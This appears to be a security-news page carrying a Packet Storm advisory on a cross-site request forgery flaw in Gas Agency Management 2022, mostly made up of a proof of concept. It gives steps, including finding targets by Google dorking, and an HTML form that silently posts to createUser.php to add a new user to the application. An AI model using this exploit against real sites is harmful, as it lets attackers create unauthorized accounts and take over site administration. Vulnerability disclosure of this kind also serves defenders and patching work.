Security
Headlines
HeadlinesLatestCVEs

Headline

Gas Agency Management 2022 Cross Site Request Forgery

Gas Agency Management version 2022 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Gas Agency Management 2022 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new user .

[+] Go to the line 1.

[+] Set the target site link Save changes and apply .

[+] infected file : /php_action/createUser.php.

[+] http://127.0.0.1/gasmark/php_action/createUser.php.

[+] save code as poc.html .

<form class="form-horizontal" method="POST" id="submitUserForm" action="http://127.0.0.1/gasmark/php_action/createUser.php" enctype="multipart/form-data">

                               <input type="hidden" name="currnt_date" class="form-control">

                                    <div class="form-group">  
                                        <div class="row">  
                                            <label class="col-sm-3 control-label">Username</label>  
                                            <div class="col-sm-9">  
                                              <input type="text" name="userName" id="username" class="form-control" placeholder="Username" required="" pattern="^[a-zA-z0-9]+$">  
                                            </div>  
                                        </div>  
                                    </div>  
                                   <div class="form-group">  
                                        <div class="row">  
                                            <label class="col-sm-3 control-label">Password</label>  
                                            <div class="col-sm-9">  
                                             <input type="password" class="form-control" id="upassword" placeholder="Password" name="upassword">  
                                            </div>  
                                        </div>  
                                    </div>  
                                     <div class="form-group">  
                                        <div class="row">  
                                            <label class="col-sm-3 control-label">Email</label>  
                                            <div class="col-sm-9">  
                                              <input type="email" class="form-control" id="uemail" placeholder="Email" name="uemail">  
                                            </div>  
                                        </div>  
                                    </div>

                                                                           <button type="submit" name="create" id="createUserBtn" class="btn btn-primary btn-flat m-b-30 m-t-30">Submit</button>  
                                </form>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution